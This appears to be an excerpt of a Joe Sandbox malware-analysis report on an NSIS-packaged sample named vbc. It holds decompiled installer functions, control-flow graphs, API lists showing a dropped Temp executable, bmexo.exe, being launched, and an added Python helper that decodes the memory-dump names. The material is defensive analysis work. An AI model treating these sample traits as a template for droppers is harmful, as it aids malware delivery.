                                          • ShowWindow.USER32(?,0000000A), ref: 00404587
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
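Added example (not part of the Joe Sandbox report or its IDA plugin): a small Python helper that decodes the dump file names listed above so the addresses in the decompiled function (call sites such as 0x00404107, globals such as 0x7a7a78) can be mapped to the region and page protection they were dumped from. The field layout (process index, phase, dump id, base address, protection, two undecoded fields, region type) is an assumption inferred from the listing, not a documented Joe Sandbox naming scheme; the protection and type fields are read as the winnt.h PAGE_* and MEM_* constants, which is the only reading under which every entry above decodes to a valid constant (0x20 PAGE_EXECUTE_READ for the .text dump at 0x401000, 0x02 and 0x04 for the header and data dumps, 0x1000000 MEM_IMAGE throughout). Fields 6 and 8 are kept verbatim because the report gives no basis for decoding them.

```python
"""Decode Joe Sandbox memory-dump names from the "Memory Dump Source" list.

Assumed layout (inferred from the listing, not documented):
  <proc index>.<phase>.<dump id>.<base addr>.<protect>.<field6>.<type>.<field8>.sdmp
Fields 5 and 7 are decoded as winnt.h PAGE_* / MEM_* values (assumption).
"""
from dataclasses import dataclass
from typing import Iterable, List, Optional

# winnt.h page-protection values (low byte) and modifier bits
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
# winnt.h region-type values
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


@dataclass(frozen=True)
class DumpRegion:
    process_index: int  # report-internal process number, not an OS PID (assumption)
    phase: int          # assumption: analysis phase in which the dump was taken
    dump_id: str        # opaque identifier, kept verbatim
    base: int           # region base address
    protect: int        # PAGE_* value
    field6: str         # meaning not established by the report; kept raw
    mem_type: int       # MEM_* value
    field8: str         # meaning not established by the report; kept raw

    @property
    def protect_name(self) -> str:
        names = [PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:x}")]
        names += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join(names)

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)   # any PAGE_EXECUTE* variant

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)   # READWRITE/WRITECOPY and their EXECUTE variants


def parse_dump_name(name: str) -> DumpRegion:
    stem = name.rsplit("/", 1)[-1]
    if stem.endswith(".sdmp"):
        stem = stem[: -len(".sdmp")]
    parts = stem.split(".")
    if len(parts) != 8:
        raise ValueError(f"expected 8 dot-separated fields, got {len(parts)}: {name}")
    return DumpRegion(
        process_index=int(parts[0], 16), phase=int(parts[1], 16), dump_id=parts[2],
        base=int(parts[3], 16), protect=int(parts[4], 16), field6=parts[5],
        mem_type=int(parts[6], 16), field8=parts[7],
    )


def region_for(regions: Iterable[DumpRegion], address: int) -> Optional[DumpRegion]:
    """Region with the highest base not above `address`. The names carry no
    size, so this is a lower-bound guess, not proven containment."""
    hits = [r for r in regions if r.base <= address]
    return max(hits, key=lambda r: r.base) if hits else None


def executable_regions(regions: Iterable[DumpRegion]) -> List[DumpRegion]:
    return [r for r in regions if r.executable]


# The twelve names from the report's "Memory Dump Source" list, copied verbatim.
DUMP_NAMES = [
    "00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp",
    "00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp",
    "00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp",
    "00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp",
    "00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp",
]
REGIONS = [parse_dump_name(n) for n in DUMP_NAMES]

if __name__ == "__main__":
    for r in REGIONS:
        print(f"{r.base:#010x} {r.protect_name:<22} {r.type_name:<10} exec={r.executable}")
    # SetWindowPos call site from the APIs list, and a global the dialog proc writes
    for addr in (0x00404107, 0x007A7A78):
        hit = region_for(REGIONS, addr)
        print(f"{addr:#010x} -> region {hit.base:#010x} ({hit.protect_name})")
```

Run stand-alone it lists the twelve regions and shows that only the 0x401000 dump is executable (the one the decompiled function's addresses fall in) while the globals the dialog procedure reads and writes (0x7a7a78, 0x7a8b2c) resolve to PAGE_READWRITE data regions. Because the names carry no region size, `region_for` is a nearest-lower-base lookup; confirm containment against the dump itself before relying on it.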
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                          • String ID:
                                          • API String ID: 1860320154-0
                                          • Opcode ID: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                                          • Instruction ID: f65a6081c11fa3fb00f54a078e57315272211b1d7c342d1bec1514082707246b
                                          • Opcode Fuzzy Hash: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                                          • Instruction Fuzzy Hash: 63C1ADB1500204BFDB216F65EE49E2A3AA8EBC6745F00853EF741B55E0CB3D5851DB2E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 248 403d1d-403d35 call 406a3b 251 403d37-403d47 call 4065b5 248->251 252 403d49-403d80 call 40653c 248->252 261 403da3-403dcc call 403ff3 call 406045 251->261 257 403d82-403d93 call 40653c 252->257 258 403d98-403d9e lstrcatW 252->258 257->258 258->261 266 403dd2-403dd7 261->266 267 403e5e-403e66 call 406045 261->267 266->267 268 403ddd-403e05 call 40653c 266->268 273 403e74-403e99 LoadImageW 267->273 274 403e68-403e6f call 4066ab 267->274 268->267 275 403e07-403e0b 268->275 277 403f1a-403f22 call 40140b 273->277 278 403e9b-403ecb RegisterClassW 273->278 274->273 279 403e1d-403e29 lstrlenW 275->279 280 403e0d-403e1a call 405f6a 275->280 292 403f24-403f27 277->292 293 403f2c-403f37 call 403ff3 277->293 281 403ed1-403f15 SystemParametersInfoW CreateWindowExW 278->281 282 403fe9 278->282 286 403e51-403e59 call 405f3d call 40666e 279->286 287 403e2b-403e39 lstrcmpiW 279->287 280->279 281->277 285 403feb-403ff2 282->285 286->267 287->286 291 403e3b-403e45 GetFileAttributesW 287->291 296 403e47-403e49 291->296 297 403e4b-403e4c call 405f89 291->297 292->285 301 403fc0-403fc8 call 4057a3 293->301 302 403f3d-403f57 ShowWindow call 4069cb 293->302 296->286 296->297 297->286 307 403fe2-403fe4 call 40140b 301->307 308 403fca-403fd0 301->308 309 403f63-403f75 GetClassInfoW 302->309 310 403f59-403f5e call 4069cb 302->310 307->282 308->292 311 403fd6-403fdd call 40140b 308->311 314 403f77-403f87 GetClassInfoW RegisterClassW 309->314 315 403f8d-403fb0 DialogBoxParamW call 40140b 309->315 310->309 311->292 314->315 319 403fb5-403fbe call 403c6d 315->319 319->285
                                          C-Code - Quality: 96%
                                          			E00403D1D(void* __eflags) {
                                          				intOrPtr _v4;
                                          				intOrPtr _v8;
                                          				int _v12;
                                          				void _v16;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr* _t22;
                                          				void* _t30;
                                          				void* _t32;
                                          				int _t33;
                                          				void* _t36;
                                          				int _t39;
                                          				int _t40;
                                          				int _t44;
                                          				short _t63;
                                          				WCHAR* _t65;
                                          				signed char _t69;
                                          				WCHAR* _t76;
                                          				intOrPtr _t82;
                                          				WCHAR* _t87;
                                          
                                          				_t82 =  *0x7a8ab0;
                                          				_t22 = E00406A3B(2);
                                          				_t90 = _t22;
                                          				if(_t22 == 0) {
                                          					_t76 = 0x7a1f88;
                                          					L"1033" = 0x30;
                                          					 *0x7b5002 = 0x78;
                                          					 *0x7b5004 = 0;
                                          					E0040653C(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f88, 0);
                                          					__eflags =  *0x7a1f88;
                                          					if(__eflags == 0) {
                                          						E0040653C(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f88, 0);
                                          					}
                                          					lstrcatW(L"1033", _t76);
                                          				} else {
                                          					E004065B5(L"1033",  *_t22() & 0x0000ffff);
                                          				}
                                          				E00403FF3(_t78, _t90);
                                          				 *0x7a8b20 =  *0x7a8ab8 & 0x00000020;
                                          				 *0x7a8b3c = 0x10000;
                                          				if(E00406045(_t90, 0x7b3800) != 0) {
                                          					L16:
                                          					if(E00406045(_t98, 0x7b3800) == 0) {
                                          						E004066AB(_t76, 0, _t82, 0x7b3800,  *((intOrPtr*)(_t82 + 0x118)));
                                          					}
                                          					_t30 = LoadImageW( *0x7a8aa0, 0x67, 1, 0, 0, 0x8040);
                                          					 *0x7a7a88 = _t30;
                                          					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                          						L21:
                                          						if(E0040140B(0) == 0) {
                                          							_t32 = E00403FF3(_t78, __eflags);
                                          							__eflags =  *0x7a8b40;
                                          							if( *0x7a8b40 != 0) {
                                          								_t33 = E004057A3(_t32, 0);
                                          								__eflags = _t33;
                                          								if(_t33 == 0) {
                                          									E0040140B(1);
                                          									goto L33;
                                          								}
                                          								__eflags =  *0x7a7a6c;
                                          								if( *0x7a7a6c == 0) {
                                          									E0040140B(2);
                                          								}
                                          								goto L22;
                                          							}
                                          							ShowWindow( *0x7a1f68, 5); // executed
                                          							_t39 = E004069CB("RichEd20"); // executed
                                          							__eflags = _t39;
                                          							if(_t39 == 0) {
                                          								E004069CB("RichEd32");
                                          							}
                                          							_t87 = L"RichEdit20W";
                                          							_t40 = GetClassInfoW(0, _t87, 0x7a7a40);
                                          							__eflags = _t40;
                                          							if(_t40 == 0) {
                                          								GetClassInfoW(0, L"RichEdit", 0x7a7a40);
                                          								 *0x7a7a64 = _t87;
                                          								RegisterClassW(0x7a7a40);
                                          							}
                                          							_t44 = DialogBoxParamW( *0x7a8aa0,  *0x7a7a80 + 0x00000069 & 0x0000ffff, 0, E004040CB, 0); // executed
                                          							E00403C6D(E0040140B(5), 1);
                                          							return _t44;
                                          						}
                                          						L22:
                                          						_t36 = 2;
                                          						return _t36;
                                          					} else {
                                          						_t78 =  *0x7a8aa0;
                                          						 *0x7a7a44 = E00401000;
                                          						 *0x7a7a50 =  *0x7a8aa0;
                                          						 *0x7a7a54 = _t30;
                                          						 *0x7a7a64 = 0x40a3b4;
                                          						if(RegisterClassW(0x7a7a40) == 0) {
                                          							L33:
                                          							__eflags = 0;
                                          							return 0;
                                          						}
                                          						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                          						 *0x7a1f68 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8aa0, 0);
                                          						goto L21;
                                          					}
                                          				} else {
                                          					_t78 =  *(_t82 + 0x48);
                                          					_t92 = _t78;
                                          					if(_t78 == 0) {
                                          						goto L16;
                                          					}
                                          					_t76 = 0x7a6a40;
                                          					E0040653C(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8ad8 + _t78 * 2,  *0x7a8ad8 +  *(_t82 + 0x4c) * 2, 0x7a6a40, 0);
                                          					_t63 =  *0x7a6a40; // 0x43
                                          					if(_t63 == 0) {
                                          						goto L16;
                                          					}
                                          					if(_t63 == 0x22) {
                                          						_t76 = 0x7a6a42;
                                          						 *((short*)(E00405F6A(0x7a6a42, 0x22))) = 0;
                                          					}
                                          					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                          					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                          						L15:
                                          						E0040666E(0x7b3800, E00405F3D(_t76));
                                          						goto L16;
                                          					} else {
                                          						_t69 = GetFileAttributesW(_t76);
                                          						if(_t69 == 0xffffffff) {
                                          							L14:
                                          							E00405F89(_t76);
                                          							goto L15;
                                          						}
                                          						_t98 = _t69 & 0x00000010;
                                          						if((_t69 & 0x00000010) != 0) {
                                          							goto L15;
                                          						}
                                          						goto L14;
                                          					}
                                          				}
                                          			}
                                          0x00403d23
                                          0x00403d2c
                                          0x00403d33
                                          0x00403d35
                                          0x00403d49
                                          0x00403d5b
                                          0x00403d64
                                          0x00403d6d
                                          0x00403d74
                                          0x00403d79
                                          0x00403d80
                                          0x00403d93
                                          0x00403d93
                                          0x00403d9e
                                          0x00403d37
                                          0x00403d42
                                          0x00403d42
                                          0x00403da3
                                          0x00403db6
                                          0x00403dbb
                                          0x00403dcc
                                          0x00403e5e
                                          0x00403e66
                                          0x00403e6f
                                          0x00403e6f
                                          0x00403e85
                                          0x00403e8b
                                          0x00403e99
                                          0x00403f1a
                                          0x00403f22
                                          0x00403f2c
                                          0x00403f31
                                          0x00403f37
                                          0x00403fc1
                                          0x00403fc6
                                          0x00403fc8
                                          0x00403fe4
                                          0x00000000
                                          0x00403fe4
                                          0x00403fca
                                          0x00403fd0
                                          0x00403fd8
                                          0x00403fd8
                                          0x00000000
                                          0x00403fd0
                                          0x00403f45
                                          0x00403f50
                                          0x00403f55
                                          0x00403f57
                                          0x00403f5e
                                          0x00403f5e
                                          0x00403f69
                                          0x00403f71
                                          0x00403f73
                                          0x00403f75
                                          0x00403f7e
                                          0x00403f81
                                          0x00403f87
                                          0x00403f87
                                          0x00403fa6
                                          0x00403fb7
                                          0x00000000
                                          0x00403fbc
                                          0x00403f24
                                          0x00403f26
                                          0x00000000
                                          0x00403e9b
                                          0x00403e9b
                                          0x00403ea7
                                          0x00403eb1
                                          0x00403eb7
                                          0x00403ebc
                                          0x00403ecb
                                          0x00403fe9
                                          0x00403fe9
                                          0x00000000
                                          0x00403fe9
                                          0x00403eda
                                          0x00403f15
                                          0x00000000
                                          0x00403f15
                                          0x00403dd2
                                          0x00403dd2
                                          0x00403dd5
                                          0x00403dd7
                                          0x00000000
                                          0x00000000
                                          0x00403de5
                                          0x00403df7
                                          0x00403dfc
                                          0x00403e05
                                          0x00000000
                                          0x00000000
                                          0x00403e0b
                                          0x00403e0d
                                          0x00403e1a
                                          0x00403e1a
                                          0x00403e23
                                          0x00403e29
                                          0x00403e51
                                          0x00403e59
                                          0x00000000
                                          0x00403e3b
                                          0x00403e3c
                                          0x00403e45
                                          0x00403e4b
                                          0x00403e4c
                                          0x00000000
                                          0x00403e4c
                                          0x00403e47
                                          0x00403e49
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403e49
                                          0x00403e29

                                          APIs
                                            • Part of subcall function 00406A3B: GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                                            • Part of subcall function 00406A3B: GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                                          • lstrcatW.KERNEL32 ref: 00403D9E
                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,?,?,?,C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000000,007B3800,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000,00000002,7556D4C4), ref: 00403E1E
                                          • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,?,?,?,C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000000,007B3800,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000), ref: 00403E31
                                          • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,?,00000000,?), ref: 00403E3C
                                          • LoadImageW.USER32 ref: 00403E85
                                            • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                                          • RegisterClassW.USER32 ref: 00403EC2
                                          • SystemParametersInfoW.USER32 ref: 00403EDA
                                          • CreateWindowExW.USER32 ref: 00403F0F
                                          • ShowWindow.USER32(00000005,00000000), ref: 00403F45
                                          • GetClassInfoW.USER32 ref: 00403F71
                                          • GetClassInfoW.USER32 ref: 00403F7E
                                          • RegisterClassW.USER32 ref: 00403F87
                                          • DialogBoxParamW.USER32 ref: 00403FA6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: .DEFAULT\Control Panel\International$.exe$1033$@zz$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                          • API String ID: 1975747703-622700630
                                          • Opcode ID: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                                          • Instruction ID: b3798c48b8e7ed104fde3a001c8dc5b3ad58c50dca8dc7adab70101e5acdd628
                                          • Opcode Fuzzy Hash: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                                          • Instruction Fuzzy Hash: 6561C170640200BED620AF669D46F2B3A6CEBC5B45F40853FF941B62E2DB7D8901CB6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 40615e 325 403120-403125 322->325 326 40312a-403158 call 40666e call 405f89 call 40666e GetFileSize 322->326 327 403370-403374 325->327 334 403246-403254 call 40302e 326->334 335 40315e-403175 326->335 341 403328-40332d 334->341 342 40325a-40325d 334->342 337 403177 335->337 338 403179-403186 call 4035e8 335->338 337->338 346 4032e4-4032ec call 40302e 338->346 347 40318c-403192 338->347 341->327 344 403289-4032d8 GlobalAlloc call 40618d CreateFileW 342->344 345 40325f-403277 call 4035fe call 4035e8 342->345 361 4032da-4032df 344->361 362 4032ee-40331e call 4035fe call 403377 344->362 345->341 374 40327d-403283 345->374 346->341 351 403212-403216 347->351 352 403194-4031ac call 406119 347->352 357 403218-40321e call 40302e 351->357 358 40321f-403225 351->358 352->358 367 4031ae-4031b5 352->367 357->358 359 403227-403235 call 406b28 358->359 360 403238-403240 358->360 359->360 360->334 360->335 361->327 378 403323-403326 362->378 367->358 372 4031b7-4031be 367->372 372->358 375 4031c0-4031c7 372->375 374->341 374->344 375->358 377 4031c9-4031d0 375->377 377->358 379 4031d2-4031f2 377->379 378->341 380 40332f-403340 378->380 379->341 381 4031f8-4031fc 379->381 382 403342 380->382 383 403348-40334d 380->383 384 403204-40320c 381->384 385 4031fe-403202 381->385 382->383 386 40334e-403354 383->386 384->358 387 40320e-403210 384->387 385->334 385->384 386->386 388 403356-40336e call 406119 386->388 387->358 388->327
                                          C-Code - Quality: 97%
                                          			E004030D0(void* __eflags, signed int _a4) {
                                          				long _v8;
                                          				long _v12;
                                          				intOrPtr _v16;
                                          				long _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				signed int _v40;
                                          				short _v560;
                                          				long _t54;
                                          				void* _t57;
                                          				void* _t61;
                                          				intOrPtr _t64;
                                          				void* _t67;
                                          				intOrPtr* _t69;
                                          				long _t81;
                                          				signed int _t88;
                                          				intOrPtr _t91;
                                          				void* _t94;
                                          				void* _t99;
                                          				void* _t103;
                                          				long _t104;
                                          				long _t107;
                                          				void* _t108;
                                          
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				 *0x7a8aac = GetTickCount() + 0x3e8;
                                          				GetModuleFileNameW(0, 0x7b6800, 0x400);
                                          				_t103 = E0040615E(0x7b6800, 0x80000000, 3);
                                          				 *0x40a018 = _t103;
                                          				if(_t103 == 0xffffffff) {
                                          					return L"Error launching installer";
                                          				}
                                          				E0040666E(0x7b4800, 0x7b6800);
                                          				E0040666E(0x7b7000, E00405F89(0x7b4800));
                                          				_t54 = GetFileSize(_t103, 0);
                                          				 *0x79f740 = _t54;
                                          				_t107 = _t54;
                                          				if(_t54 <= 0) {
                                          					L22:
                                          					E0040302E(1);
                                          					_pop(_t94);
                                          					if( *0x7a8ab4 == 0) {
                                          						goto L30;
                                          					}
                                          					if(_v12 == 0) {
                                          						L26:
                                          						_t57 = GlobalAlloc(0x40, _v20); // executed
                                          						_t108 = _t57;
                                          						 *0x40ce78 = 0xb;
                                          						 *0x40ce90 = 0; // executed
                                          						E0040618D(_t94,  &_v560, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
                                          						_t61 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                          						 *0x40a01c = _t61;
                                          						if(_t61 != 0xffffffff) {
                                          							_t64 = E004035FE( *0x7a8ab4 + 0x1c);
                                          							 *0x79f744 = _t64;
                                          							 *0x79f738 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                          							_t67 = E00403377(_v16, 0xffffffff, 0, _t108, _v20); // executed
                                          							if(_t67 == _v20) {
                                          								 *0x7a8ab0 = _t108;
                                          								 *0x7a8ab8 =  *_t108;
                                          								if((_v40 & 0x00000001) != 0) {
                                          									 *0x7a8abc =  *0x7a8abc + 1;
                                          								}
                                          								_t45 = _t108 + 0x44; // 0x44
                                          								_t69 = _t45;
                                          								_t99 = 8;
                                          								do {
                                          									_t69 = _t69 - 8;
                                          									 *_t69 =  *_t69 + _t108;
                                          									_t99 = _t99 - 1;
                                          								} while (_t99 != 0);
                                          								 *((intOrPtr*)(_t108 + 0x3c)) =  *0x79f734;
                                          								E00406119(0x7a8ac0, _t108 + 4, 0x40);
                                          								return 0;
                                          							}
                                          							goto L30;
                                          						}
                                          						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                          					}
                                          					E004035FE( *0x79f730);
                                          					if(E004035E8( &_a4, 4) == 0 || _v8 != _a4) {
                                          						goto L30;
                                          					} else {
                                          						goto L26;
                                          					}
                                          				} else {
                                          					do {
                                          						_t104 = _t107;
                                          						asm("sbb eax, eax");
                                          						_t81 = ( ~( *0x7a8ab4) & 0x00007e00) + 0x200;
                                          						if(_t107 >= _t81) {
                                          							_t104 = _t81;
                                          						}
                                          						if(E004035E8(0x797730, _t104) == 0) {
                                          							E0040302E(1);
                                          							L30:
                                          							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                          						}
                                          						if( *0x7a8ab4 != 0) {
                                          							if((_a4 & 0x00000002) == 0) {
                                          								E0040302E(0);
                                          							}
                                          							goto L19;
                                          						}
                                          						E00406119( &_v40, 0x797730, 0x1c);
                                          						_t88 = _v40;
                                          						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                          							_a4 = _a4 | _t88;
                                          							 *0x7a8b40 =  *0x7a8b40 | _a4 & 0x00000002;
                                          							_t91 = _v16;
                                          							 *0x7a8ab4 =  *0x79f730;
                                          							if(_t91 > _t107) {
                                          								goto L30;
                                          							}
                                          							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                          								_v12 = _v12 + 1;
                                          								_t107 = _t91 - 4;
                                          								if(_t104 > _t107) {
                                          									_t104 = _t107;
                                          								}
                                          								goto L19;
                                          							} else {
                                          								goto L22;
                                          							}
                                          						}
                                          						L19:
                                          						if(_t107 <  *0x79f740) {
                                          							_v8 = E00406B28(_v8, 0x797730, _t104);
                                          						}
                                          						 *0x79f730 =  *0x79f730 + _t104;
                                          						_t107 = _t107 - _t104;
                                          					} while (_t107 != 0);
                                          					goto L22;
                                          				}
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004030E4
                                          • GetModuleFileNameW.KERNEL32(00000000,007B6800,00000400), ref: 00403100
                                            • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
                                            • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                                          • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,007B6800,007B6800,80000000,00000003), ref: 00403149
                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328E
                                          Strings
                                          • Null, xrefs: 004031C9
                                          • Error launching installer, xrefs: 00403120
                                          • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 00403328
                                          • Inst, xrefs: 004031B7
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004030DA, 0040329C
                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032DA
                                          • soft, xrefs: 004031C0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
